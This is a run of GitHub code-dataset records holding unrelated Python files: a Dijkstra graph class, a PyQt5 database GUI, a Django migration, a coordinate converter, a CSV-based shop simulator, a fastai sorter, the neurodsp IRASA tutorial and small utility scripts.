\"\"\"\n Given two vertices, return the weight between the two.\n\n Args:\n v_i: an integer representing the first vertex.\n v_j: an integer representing the second vertex.\n\n Returns: an integer that represents the weight between the two vertices.\n \"\"\"\n\n weight = self.graph[v_i][v_j]\n return weight\n\n def visualize_graph(self):\n \"\"\"\n Visualize a graph in adjacency matrix form given the matrix and number of vertex\n and save file in Graphs folder.\n\n Args:\n self: an instance of the Graph class.\n \"\"\"\n graph_viz = nx.DiGraph()\n for row in range(self.vertices):\n for column in range(self.vertices):\n edge_weight = self.get_weights(row, column)\n if edge_weight > 0:\n graph_viz.add_edge(row, column, weight=edge_weight)\n pos = nx.spring_layout(graph_viz)\n nx.draw(graph_viz, pos, node_color=\"orange\", with_labels=True)\n # specifiy edge labels explicitly\n edge_labels = dict(\n [\n (\n (\n u,\n v,\n ),\n d[\"weight\"],\n )\n for u, v, d in graph_viz.edges(data=True)\n ]\n )\n nx.draw_networkx_edge_labels(graph_viz, pos, edge_labels=edge_labels)\n graph_time = str(time.time())[-4:]\n plt.show(block=False)\n plt.savefig(\n f\"Graphs/graph_{graph_time}.PNG\", format=\"PNG\", facecolor=\"aliceblue\"\n )\n plt.cla()\n plt.clf()\n\n def dijkstra(self, source, end):\n \"\"\"\n Dijkstra's Algorithm that finds the shortest path from one vertex\n to another given all weights assigned to edges.\n\n Args:\n self: an instance of the Graph class.\n source: an integer representing the starting vertex.\n end: an integer representing the ending vertex.\n\n Returns: an integer representing the shortest path from source to end\n \"\"\"\n\n visited_nodes = []\n unvisited_nodes = []\n\n # Append all nodes to unvisited list\n for i in range(self.vertices):\n unvisited_nodes.append(i)\n current_node = source\n\n # Create a list with the source and infinities\n shortest_path = [self.INF] * self.vertices\n shortest_path[source] = 0\n\n while end not in visited_nodes:\n min_value = self.INF\n min_value_index = None\n for i, dist_value in enumerate(shortest_path):\n if dist_value < min_value and i not in visited_nodes:\n # length of shortest path neighbor\n min_value = dist_value \n # index of shortest path neighbor\n min_value_index = i\n if current_node in unvisited_nodes:\n visited_nodes.append(current_node)\n unvisited_nodes.remove(current_node)\n for node in unvisited_nodes:\n # Get edge weight\n edge_weight = self.get_weights(current_node, node)\n # If the weight is not zero...\n if edge_weight != 0:\n # If the current shortest path plus the edge weight is less than\n # the shortest path of node, update the shortest path\n if shortest_path[current_node] + edge_weight < shortest_path[node]:\n shortest_path[node] = shortest_path[current_node] + edge_weight\n # Go to the next node\n current_node = min_value_index\n return shortest_path[end]\n","repo_name":"prishabhatia20/Shortest-Path-Algorithm","sub_path":"shortest_path.py","file_name":"shortest_path.py","file_ext":"py","file_size_in_byte":4370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22299889449","text":"\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(808, 648)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setMaximumSize(QtCore.QSize(16777215, 556))\n self.centralwidget.setObjectName(\"centralwidget\")\n 
self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)\n self.tabWidget.setObjectName(\"tabWidget\")\n\n self.tab = QtWidgets.QWidget()\n self.tab.setObjectName(\"tab\")\n self.listWidget = QtWidgets.QListWidget(self.tab)\n self.listWidget.setGeometry(QtCore.QRect(80, 110, 256, 200))\n self.listWidget.setObjectName(\"listWidget\")\n self.tabWidget.addTab(self.tab, \"\")\n\n self.tab_2 = QtWidgets.QWidget()\n self.tab_2.setObjectName(\"tab_2\")\n self.ComboBox = QtWidgets.QComboBox(self.tab_2)\n self.ComboBox.setGeometry(QtCore.QRect(40, 70, 86, 25))\n self.ComboBox.setObjectName(\"ComboBox\")\n self.ButtonComboBox = QtWidgets.QPushButton(self.tab_2)\n self.ButtonComboBox.setGeometry(QtCore.QRect(40, 130, 89, 25))\n self.ButtonComboBox.setObjectName(\"ButtonComboBox\")\n self.groupBox = QtWidgets.QGroupBox(self.tab_2)\n self.groupBox.setGeometry(QtCore.QRect(320, 20, 441, 461))\n self.groupBox.setObjectName(\"groupBox\")\n self.tabWidget.addTab(self.tab_2, \"\")\n\n\n self.tab_3 = QtWidgets.QWidget()\n self.tab_3.setObjectName(\"tab_3\")\n self.pushButton_SQB = QtWidgets.QPushButton(self.tab_3)\n self.pushButton_SQB.setGeometry(QtCore.QRect(20, 30, 211, 81))\n self.pushButton_SQB.setObjectName(\"SelectQueryButton\")\n\n\n self.groupBoxQPRICE = QtWidgets.QGroupBox(self.tab_3)\n self.groupBoxQPRICE.setGeometry(QtCore.QRect(250, 30, 150, 80))\n self.groupBoxQPRICE.setObjectName(\"groupBoxTabT3\")\n self.radioButN = QtWidgets.QRadioButton(self.groupBoxQPRICE)\n self.radioButN.setGeometry(QtCore.QRect(5, 10, 100, 15))\n self.radioButN.setObjectName(\"radioButN\")\n self.radioButB = QtWidgets.QRadioButton(self.groupBoxQPRICE)\n self.radioButB.setGeometry(QtCore.QRect(5, 30, 150, 15))\n self.radioButB.setObjectName(\"radioButB\")\n self.radioButM = QtWidgets.QRadioButton(self.groupBoxQPRICE)\n self.radioButM.setGeometry(QtCore.QRect(5, 50, 150, 15))\n self.radioButM.setObjectName(\"radioButM\")\n\n self.groupBoxCheck = QtWidgets.QGroupBox(self.tab_3)\n self.groupBoxCheck.setGeometry(QtCore.QRect(410, 30, 150, 80))\n self.groupBoxCheck.setObjectName(\"groupBoxCheck\")\n self.check_date = QtWidgets.QCheckBox(self.groupBoxCheck)\n self.check_date.setGeometry(QtCore.QRect(5, 15, 120, 20))\n self.check_date.setObjectName(\"groupBoxCheck\")\n self.check_phone = QtWidgets.QCheckBox(self.groupBoxCheck)\n self.check_phone.setGeometry(QtCore.QRect(5, 45, 120, 20))\n self.check_phone.setObjectName(\"groupBoxCheck\")\n\n self.groupBoxT3 = QtWidgets.QGroupBox(self.tab_3)\n self.groupBoxT3.setGeometry(QtCore.QRect(20, 130, 370, 300))\n self.groupBoxT3.setObjectName(\"groupBoxTabT3\")\n self.LabelCTName = QtWidgets.QLabel(self.groupBoxT3)\n self.LabelCTName.setGeometry(QtCore.QRect(40, 70, 86, 25))\n self.LabelCTName.setObjectName(\"LabelCTName\")\n self.ComboBoxT3Tname = QtWidgets.QComboBox(self.groupBoxT3)\n self.ComboBoxT3Tname.setGeometry(QtCore.QRect(40, 100, 86, 25))\n self.ComboBoxT3Tname.setObjectName(\"ComboBoxT3Tname\")\n self.LabelCinfo = QtWidgets.QLabel(self.groupBoxT3)\n self.LabelCinfo.setGeometry(QtCore.QRect(120, 20, 100, 25))\n self.LabelCinfo.setObjectName(\"LabelCinfo\")\n self.LabelCCName = QtWidgets.QLabel(self.groupBoxT3)\n self.LabelCCName.setGeometry(QtCore.QRect(170, 70, 100, 25))\n self.LabelCCName.setObjectName(\"LabelCTName\")\n self.ComboBoxT3Cname = QtWidgets.QComboBox(self.groupBoxT3)\n self.ComboBoxT3Cname.setGeometry(QtCore.QRect(150, 100, 100, 25))\n 
self.ComboBoxT3Cname.setObjectName(\"ComboBoxT3Cname\")\n\n self.groupBoxT3Q = QtWidgets.QGroupBox(self.tab_3)\n self.groupBoxT3Q.setGeometry(QtCore.QRect(400, 130, 370, 300))\n self.groupBoxT3Q.setObjectName(\"groupBoxT3Q\")\n self.ReqLine = QtWidgets.QLineEdit(self.groupBoxT3Q)\n self.ReqLine.setGeometry(QtCore.QRect(75, 120, 220, 30))\n self.ReqLine.setObjectName(\"ReqLine\")\n self.pushButton_FIND = QtWidgets.QPushButton(self.groupBoxT3Q)\n self.pushButton_FIND.setGeometry(QtCore.QRect(140, 220, 100, 50))\n self.pushButton_FIND.setObjectName(\"pushButton_FIND\")\n self.LabelLCinfo = QtWidgets.QLabel(self.groupBoxT3Q)\n self.LabelLCinfo.setGeometry(QtCore.QRect(130, 20, 200, 50))\n self.LabelLCinfo.setObjectName(\"LabelLCinfo\")\n\n self.groupBoxT3Sale = QtWidgets.QGroupBox(self.tab_3)\n self.groupBoxT3Sale.setGeometry(QtCore.QRect(400, 435, 370, 60))\n self.groupBoxT3Sale.setObjectName(\"groupBoxT3Sale\")\n self.radioButSnot = QtWidgets.QRadioButton(self.groupBoxT3Sale)\n self.radioButSnot.setGeometry(QtCore.QRect(5, 25, 100, 15))\n self.radioButSnot.setObjectName(\"radioButSnot\")\n self.radioButSale = QtWidgets.QRadioButton(self.groupBoxT3Sale)\n self.radioButSale.setGeometry(QtCore.QRect(110, 25, 100, 15))\n self.radioButSale.setObjectName(\"radioButSale\")\n self.ReqLineSale = QtWidgets.QLineEdit(self.groupBoxT3Sale)\n self.ReqLineSale.setGeometry(QtCore.QRect(220, 20, 100, 25))\n self.ReqLineSale.setObjectName(\"ReqLineSale\")\n self.LabelLProc = QtWidgets.QLabel(self.groupBoxT3Sale)\n self.LabelLProc.setGeometry(QtCore.QRect(330, 20, 100, 25))\n self.LabelLProc.setObjectName(\"LabelLProc\")\n\n self.tabWidget.addTab(self.tab_3, \"\")\n\n\n self.verticalLayout.addWidget(self.tabWidget)\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 808, 22))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n self.tabWidget.setCurrentIndex(1)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"RGZ_DB\"))\n self.pushButton_SQB.setText(_translate(\"MainWindow\", \"Выполнить\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate(\"MainWindow\", \"Просмотр Таблиц\"))\n self.ButtonComboBox.setText(_translate(\"MainWindow\", \"Select DB\"))\n self.groupBox.setTitle(_translate(\"MainWindow\", \"GroupBox\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate(\"MainWindow\", \"Добавление Данных\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_3), _translate(\"MainWindow\", \"Выборка\"))\n self.radioButN.setText(_translate(\"MainWindow\", \"Defolt\"))\n self.radioButB.setText(_translate(\"MainWindow\", \"Цена >= 1000\"))\n self.radioButM.setText(_translate(\"MainWindow\", \"Цена < 1000\"))\n self.pushButton_FIND.setText(_translate(\"MainWindow\", \"Найти\"))\n self.LabelCTName.setText(_translate(\"MainWindow\", \"Таблица\"))\n self.LabelCCName.setText(_translate(\"MainWindow\", \"Поле\"))\n self.LabelCinfo.setText(_translate(\"MainWindow\", \"Выбор\"))\n self.check_date.setText(_translate(\"MainWindow\", \"Дата\"))\n self.check_phone.setText(_translate(\"MainWindow\", \"Телефон\"))\n 
self.LabelLCinfo.setText(_translate(\"MainWindow\", \"Текст для поиска\"))\n self.radioButSale.setText(_translate(\"MainWindow\", \"Скидка:\"))\n self.radioButSnot.setText(_translate(\"MainWindow\", \"Поиск\"))\n self.LabelLProc.setText(_translate(\"MainWindow\", \"%\"))","repo_name":"TarriestZero/DB_GUI_RGZ","sub_path":"design.py","file_name":"design.py","file_ext":"py","file_size_in_byte":8441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17219695263","text":"import uuid\n\nimport django.db.models.deletion\nfrom django.conf import settings\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('kanban_boards', '0019_kanbanboard_description'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='KanbanBoardUserSetting',\n fields=[\n ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),\n ('restrict_task_information', models.BooleanField(db_index=True, default=False, verbose_name='Whether the task information should be restricted in this Kanban Board')),\n ('day_indication', models.BooleanField(db_index=True, default=False, verbose_name='Whether the day indications for this Kanban Board should be shown')),\n ('created_at', models.DateTimeField(auto_now_add=True, db_index=True, null=True, verbose_name='Date when this element was created')),\n ('last_modified_at', models.DateTimeField(auto_now=True, db_index=True, null=True, verbose_name='Date when this element was last modified')),\n ('kanban_board', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='kanban_board_user_settings', to='kanban_boards.KanbanBoard', verbose_name='Which kanban board is this user setting for')),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='User')),\n ],\n options={\n 'verbose_name': 'Kanban Board User Setting',\n 'verbose_name_plural': 'Kanban Board User Settings',\n 'unique_together': {('kanban_board', 'user')},\n 'index_together': {('kanban_board', 'user')},\n },\n ),\n ]\n","repo_name":"eWorkbench/eWorkbench","sub_path":"backend-django/app/eric/kanban_boards/migrations/0020_kanbanboardusersetting.py","file_name":"0020_kanbanboardusersetting.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"76"} +{"seq_id":"71859365684","text":"import json\n\n\n# 获取json数据\ndef get_json():\n with open('D:/毕设/项目(开发版本)/json/china_json.json', 'r', encoding='utf8') as f:\n json_data = json.load(f)\n city_coord = {}\n for item in json_data:\n # 地级市名\n city_name = item[\"name\"]\n # 经度\n log_coord = item[\"log\"]\n log = float(log_coord)\n # 纬度\n lat_coord = item[\"lat\"]\n lat = float(lat_coord)\n city_coord[city_name] = [log, lat]\n # 将整理后的json保存在dicts中\n dicts = city_coord\n return dicts\n\n\n# 写入json文件\ndef write_json(dict_json):\n with open('D:/毕设/项目(开发版本)/json/china_coordinate.json', 'w', encoding='utf-8') as r:\n # print(dict_json)\n # 写入文件并序列化\n json.dump(dict_json, r, ensure_ascii=False, indent=4)\n\n\nfile = get_json()\nwrite_json(file)\n","repo_name":"Miukiya/CBECgoodsdata-visualization-python","sub_path":"Python_china_coord/china_coord_file.py","file_name":"china_coord_file.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} 
+{"seq_id":"9454830171","text":"from dataclasses import dataclass, field\nfrom typing import List\nimport csv\n\nchoice = \"\"\nsection = '========================================================================================'\n\n@dataclass\nclass Product:\n name: str\n price: float = 0.0\n\n@dataclass \nclass ProductStock:\n product: Product\n quantity: int\n\n@dataclass \nclass Shop:\n cash: float = 0.0\n stock: List[ProductStock] = field(default_factory=list)\n\n@dataclass\nclass Customer:\n name: str = \"\"\n budget: float = 0.0\n shopping_list: List[ProductStock] = field(default_factory=list)\n\ndef create_and_stock_shop():\n s = Shop()\n with open('../stock.csv') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n first_row = next(csv_reader)\n s.cash = float(first_row[0])\n for row in csv_reader:\n p = Product(row[0], float(row[1]))\n ps = ProductStock(p, float(row[2]))\n s.stock.append(ps)\n #print(ps)\n return s\n \ndef read_customer(file_path):\n with open(file_path) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n first_row = next(csv_reader)\n c = Customer(first_row[0], float(first_row[1]))\n for row in csv_reader:\n name = row[0]\n quantity = float(row[1])\n p = Product(name)\n ps = ProductStock(p, quantity)\n c.shopping_list.append(ps)\n return c \n\ndef buy_items(customer, shop, single):\n instock = 1\n cost = 0\n error = 0\n x = 0\n for item in customer.shopping_list: \n\n for i in shop.stock:\n\n if item.product.name == i.product.name:\n instock = 1\n\n if item.quantity <= i.quantity:\n cost += item.quantity * i.product.price\n shop.stock[x].quantity = shop.stock[x].quantity - item.quantity\n\n else:\n print(f\"{item.product.name} NOT ENOUGH IN STOCK.\")\n error = 1\n break\n\n break\n\n else:\n instock = 0\n x+=1\n\n if instock == 0:\n print(f\"{item.product.name} IS NOT IN THIS SHOP.\") \n printf(\"\\ntest\");\n error = 1\n\n cost = round(cost, 2)\n\n if cost > customer.budget:\n print('INSUFFICIENT FUNDS')\n error = 1\n \n if error == 1:\n print('INVALID PURCHASE')\n return customer, shop\n else:\n shop.cash = round(shop.cash + cost, 2)\n customer.budget = round(customer.budget - cost,2)\n print(\"SUCCESSFUL PURCHASE\")\n print(f'COST: {cost}')\n if single != 1:\n customer.shopping_list = []\n return customer, shop\n\ndef update_shop(s):\n new_list = list()\n new_list.append([s.cash])\n for item in s.stock:\n new_list.append([item.product.name, item.product.price, item.quantity])\n\n new_shop = open('..\\stock.csv', 'w', newline = '')\n csv_writer = csv.writer(new_shop)\n csv_writer.writerows(new_list)\n new_shop.close()\n\ndef update_customer(c, file):\n new_list = list()\n new_list.append([c.name, c.budget])\n for item in c.shopping_list:\n new_list.append([item.product.name, item.quantity])\n\n new_customer = open(file, 'w', newline = '')\n csv_writer = csv.writer(new_customer)\n csv_writer.writerows(new_list)\n new_customer.close()\n\ndef add_to_list(c):\n p = Product(input('Product Name: '))\n quant = int(input('Quantity: '))\n ps = ProductStock(p, quant)\n c.shopping_list.append(ps)\n return c\n \n\ndef print_product(p):\n print(f'\\nPRODUCT NAME: {p.name} \\nPRODUCT PRICE: {p.price}')\n\ndef print_customer(c):\n print(f'CUSTOMER NAME: {c.name} \\nCUSTOMER BUDGET: {c.budget}')\n \n for item in c.shopping_list:\n print_product(item.product)\n \n print(f'{c.name} ORDERS {item.quantity} OF ABOVE PRODUCT')\n cost = item.quantity * item.product.price\n print(f'The cost to {c.name} will be €{cost}')\n \ndef print_shop(s):\n print(f'Shop 
has {s.cash} in cash')\n    for item in s.stock:\n        print_product(item.product)\n        print(f'The Shop has {item.quantity} of the above')\n\nfile = \"../customer.csv\"\n\nc = read_customer(file)\n\ns = create_and_stock_shop()\n\nwhile True:\n\n    print(section)\n    print(\"WELCOME\", c.name, \"\\n1) Show Shop. \\n2) Show Customer Shopping List.\\n3) Buy Specific Item.\\n4) Buy Items. \\n5) Select Customer.\\n6) Add to Shopping List. \\n7) Exit\")\n\n    choice = input(\"ENTER NUMBER FOR OPTION: \")\n\n    choice = choice.strip()\n\n    if (choice == '1'):\n        print(section)\n        print_shop(s)\n\n    elif (choice == '2'):\n        print(section)\n        print_customer(c)\n\n    elif (choice == '3'):\n        print(section)\n        p = Product(input('Product Name: '))\n        quant = int(input('Quantity: '))\n        ps = ProductStock(p, quant)\n        c2 = Customer(c.name, c.budget)  # separate buyer, so c's own shopping list is not wiped\n        c2.shopping_list.append(ps)\n        c2, s = buy_items(c2, s, 0)\n        c.budget = c2.budget  # keep the real customer's budget in sync\n        update_shop(s)\n\n    elif (choice == '4'):\n        print(section)\n        c, s = buy_items(c, s, 0)\n        print(s.cash)\n        update_shop(s)\n        update_customer(c, file)\n\n\n    elif (choice == '5'):\n        print(section)\n        print('1) John(Successful Purchase)(DEFAULT)')\n        print('2) Cantof(Insufficient Funds)')\n        print('3) Mrs400Loaves (Insufficient Stock)')\n\n        read_c = input('Input Number of Which Customer you Wish to be: ')\n        if (read_c == '1'):\n            file = \"../customer.csv\"\n        elif (read_c == '2'):\n            file = \"../MrCantofCoke.csv\"\n        elif (read_c == '3'):\n            file = \"../Mrs400loaves.csv\"\n\n        c = read_customer(file)\n        \n    elif (choice == '6'):\n        add_to_list(c)\n        update_customer(c, file)\n\n    elif (choice == '7'):\n        print(section)\n        break\n\n    else:\n        print(section)\n        print('INVALID OPTION, PLEASE ENTER A VALID NUMBER')","repo_name":"StephenCaulfield/MPP","sub_path":"G00000001 - Dominic Carr - Assignment 1/python proc/shop.py","file_name":"shop.py","file_ext":"py","file_size_in_byte":6004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2482670217","text":"#!/usr/bin/env python\n# coding: utf-8\n# %%\n\n\nimport timm\nfrom fastai.vision.all import *\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\nimport glob\n\nroot_dir = \"/media/hdd/ART/Refs/\"\nnew_path = Path(root_dir)/\"temporary_acceptance\"\npredictions_path = Path(\"/home/eragon/Downloads/new_references\")\n\ndef predict_batch(self, item, rm_type_tfms=None, with_input=False):\n    dl = self.dls.test_dl(item, rm_type_tfms=rm_type_tfms, num_workers=0)\n    ret = self.get_preds(dl=dl,with_input=False, with_decoded=True)\n    return ret\nLearner.predict_batch = predict_batch\n\nlearn = load_learner(\"export.pkl\")\n\ntst_files = get_image_files(predictions_path)\n\nprint(len(tst_files))\n\nclasses = learn.dls.vocab\n\npreds = learn.predict_batch(tst_files)\npreds_mapped = list(map(lambda x: classes[int(x)] , preds[2]))\n\nfor i,file in enumerate(tst_files):\n    temp_path = new_path/preds_mapped[i]\n    temp_path.mkdir(exist_ok=True, parents=True)\n    shutil.move(file, temp_path)\n\n\n# %%\n\n\n\n\n","repo_name":"utility-code/ArtHelper","sub_path":".ipynb_checkpoints/predictions-checkpoint.py","file_name":"predictions-checkpoint.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"27688252661","text":"class Solution(object):\n    def maxSlidingWindow(self, nums, k):\n        \"\"\"\n        :type nums: List[int]\n        :type k: int\n        :rtype: List[int]\n        \"\"\"\n        retVal = []\n        for x in range(len(nums) - k + 1):  # one window per starting index\n            retVal.append(max(nums[x:x+k]))\n        return retVal\n\nprint(Solution().maxSlidingWindow([1,3,-1,-3,5,3,6,7], 3))\n\n","repo_name":"akuchlous/leetcode","sub_path":"sliding.py","file_name":"sliding.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"1611769334","text":"\"\"\"\nIRASA\n=====\n\nSeparate periodic and aperiodic activity with the IRASA algorithm.\n\nThe irregular resampling auto-spectral analysis (IRASA) algorithm is a method for\nseparating aperiodic (1/f) and oscillatory activity in the frequency domain.\n\nThe algorithm leverages the 'scale-free' nature of 1/f activity, resampling the data in order\nto separate activity with a characteristic frequency (such as periodic activity) from\nscale-free activity.\n\nBriefly, this method involves:\n\n1. Up- & down-sampling the signal across a range of increments.\n2. Computing the geometric mean spectra for each pair of up/down sampled signals.\n3. Estimating the aperiodic component from the median spectrum across the range of increments.\n4. 
Estimating the periodic component as the difference between the original spectrum and the\n   aperiodic estimate.\n\nFull details of the IRASA algorithm are described in\n`Wen & Liu, 2016 `_.\n\nThis tutorial covers ``neurodsp.aperiodic.irasa``.\n\"\"\"\n\n###################################################################################################\n\n# sphinx_gallery_thumbnail_number = 2\n\nimport numpy as np\nfrom neurodsp.sim import sim_combined\nfrom neurodsp.spectral import compute_spectrum, trim_spectrum\nfrom neurodsp.plts import plot_power_spectra\n\n# Import IRASA related functions\nfrom neurodsp.aperiodic import compute_irasa, fit_irasa\n\n###################################################################################################\n# Simulate Data\n# -------------\n#\n# To explore the IRASA algorithm, we'll use a simulated signal, with a combination of\n# aperiodic 1/f and oscillatory activity.\n#\n\n###################################################################################################\n\n# Simulation settings\nn_seconds = 10\nfs = 500\n\n# Define the parameters of the simulated components\ncf = 10\nexp = -2\n\n# Define the components for the simulated signal\ncomponents = {'sim_oscillation' : {'freq' : cf},\n              'sim_powerlaw' : {'exponent' : exp}}\n\n# Define the frequency range of interest for the analysis\nf_range = (1, 40)\n\n# Create the simulated time series\nsig = sim_combined(n_seconds, fs, components)\n\n###################################################################################################\n\n# Compute the power spectrum of the simulated signal\nfreqs, psd = compute_spectrum(sig, fs, nperseg=4*fs)\n\n# Trim the power spectrum to the frequency range of interest\nfreqs, psd = trim_spectrum(freqs, psd, f_range)\n\n# Plot the computed power spectrum\nplot_power_spectra(freqs, psd, title=\"Original Spectrum\")\n\n###################################################################################################\n#\n# In the above spectrum, we can see a pattern of power across all frequencies, which reflects\n# the 1/f activity, as well as a peak at 10 Hz, which represents the simulated oscillation.\n#\n\n###################################################################################################\n# IRASA\n# -----\n#\n# In the analysis of neural data, we may want to separate aperiodic and periodic components\n# of the data. Here, we explore using IRASA to do so.\n#\n# Algorithm Settings\n# ~~~~~~~~~~~~~~~~~~\n#\n# The main settings for IRASA are the resampling factors to use, set by the `hset` input.\n# Here, we will use default values, which are often sufficient.\n#\n# In the IRASA algorithm, the periodic component is calculated as the difference between\n# the full signal and the aperiodic component. 
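In terms of the arrays computed below, this\n# amounts to psd_periodic = psd - psd_aperiodic, evaluated per frequency bin.\n# 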
It may be useful to apply a threshold in\n# this calculation, to restrict the periodic component to clear 'peaks' above the aperiodic.\n#\n# Here we will use a threshold value (`thresh`), such that regions of the periodic component\n# that are not above the threshold, calculated in terms of standard deviations of the power\n# spectrum, are left as part of the aperiodic component.\n#\n\n###################################################################################################\n\n# Compute the IRASA decomposition of the data\nfreqs, psd_aperiodic, psd_periodic = compute_irasa(sig, fs, f_range=f_range, thresh=1)\n\n###################################################################################################\n\n# Plot the isolated periodic and aperiodic components\nplot_power_spectra(freqs, [psd_aperiodic, psd_periodic],\n                   labels=['aperiodic', 'periodic'], title=\"IRASA Components\")\n\n###################################################################################################\n#\n# In the above components, we can see that the IRASA approach has given what appears to be\n# a very good separation of the spectral components from our original signal.\n#\n\n###################################################################################################\n# Decomposition\n# -------------\n#\n# Note that what IRASA returns is a decomposition of the power spectrum, separating\n# aperiodic and periodic components.\n#\n# To verify that this is what the algorithm does, we can check that the spectrum\n# of the full signal is the same as the combined periodic and aperiodic IRASA components.\n#\n\n###################################################################################################\n\n# Check that the sum of IRASA components is the same as the PSD of the whole signal\npsd_irasa = psd_aperiodic + psd_periodic\nassert np.equal(psd_irasa, psd).all()\n\n###################################################################################################\n# Subsequent Analyses\n# -------------------\n#\n# One of the goals of separating the components may be to further analyze each component.\n#\n# For example, fitting the extracted aperiodic component can be done to measure the\n# properties of the aperiodic activity. 
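Conceptually this is a linear fit in\n# log-log space, along the lines of np.polyfit(np.log10(freqs), np.log10(psd_aperiodic), 1).\n# 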
Here, we can fit the IRASA extracted aperiodic\n# component to see if it matches what we simulated.\n#\n# Note that the fitting here actually measures the slope of the power spectrum, in log-log\n# space, which is equivalent to the 1/f exponent that was simulated.\n#\n\n###################################################################################################\n\n# Fit the aperiodic component of the IRASA results\nintercept, fit_sl = fit_irasa(freqs, psd_aperiodic)\nprint(\"Computed Exponent: {:1.2f}\".format(fit_sl))\nprint(\"Simulated Exponent: {:1.2f}\".format(exp))\n","repo_name":"neurodsp-tools/neurodsp","sub_path":"tutorials/aperiodic/plot_IRASA.py","file_name":"plot_IRASA.py","file_ext":"py","file_size_in_byte":6306,"program_lang":"python","lang":"en","doc_type":"code","stars":260,"dataset":"github-code","pt":"76"} +{"seq_id":"74581386165","text":"# combine multiple pickle files into a single one\n\nimport pickle\nimport sys\n\n\noutput_name = sys.argv[1]\ninput_names = sys.argv[2:]\n\nif output_name in [\"-h\", \"--help\"]:\n print(\"Usage: combine_pkls.py [output_name] [input_file1] [input_file2] ...\")\n exit()\n\ncombined_result = None\nfor idx, input_file in enumerate(input_names):\n with open(input_file, \"rb\") as f:\n data = pickle.load(f)\n if idx==0:\n combined_result = data\n if type(data) is list:\n data_type = \"list\"\n elif type(data) is dict:\n data_type = \"dict\"\n else:\n if data_type == \"list\":\n combined_result.extend(data)\n elif data_type == \"dict\":\n combined_result.update(data)\n \nwith open(output_name, \"wb\") as f:\n pickle.dump(combined_result, f)\n ","repo_name":"THGLab/iShiftML","sub_path":"dataset/dataset_process_scripts/combine_pkls.py","file_name":"combine_pkls.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13961126170","text":"#!/usr/bin/env python3\n\nimport tensorflow as tf\nfrom keras.layers import Input, Dense\nfrom keras.models import Model\nfrom keras_custom_layers import ArgMax\n\nfrom keras import backend as K\nimport os\n\n# log2(M) bits to encode\nM = 2\n# One complex channel needs two real outputs\nn_channel = 2\n\n# Define network structure\nfrom_channel = Input(shape=(n_channel,),name='input')\ninner_layer = Dense(M, activation='relu')(from_channel)\ninner_layer = Dense(M, activation='softmax')(inner_layer)\noutput_bits = ArgMax()(inner_layer)\n\ndecoder = Model(from_channel, output_bits)\n# We need an extra identity in tensorflow for the output placeholder\ntf.identity(output_bits, name='output')\nprint(decoder.summary())\n\n# Export directory\nexport_dir = os.path.dirname(os.path.realpath(__file__))\n# Load weights from Keras model\ndecoder.load_weights(export_dir + '/export/keras_weights_decoder.h5')\n# Now save as tensorflow model\nsess = K.get_session()\nsaver = tf.train.Saver()\n# Write metagraph model\nos.makedirs(export_dir + '/export/decoder', exist_ok=True)\nsaver.save(sess, export_dir + '/export/decoder/tf_model')\n# Write graph for tensorboard\ntf.summary.FileWriter(export_dir + '/export/decoder',sess.graph)\n","repo_name":"johschmitz/gr-tensorflow_cc","sub_path":"examples/save_decoder_tf.py","file_name":"save_decoder_tf.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"76"} +{"seq_id":"39156314526","text":"from a1 import *\nimport math\n\ndef findMirrorPoint(p,l):\n z1=2*l.a*(l.a*p.x+l.b*p.y+l.c)/(l.a**2+l.b**2)\n 
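# z1 and z2 are twice the components of p's signed offset from the line l\n    # (a*x + b*y + c = 0) along its normal vector (a, b); subtracting them mirrors p\n    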
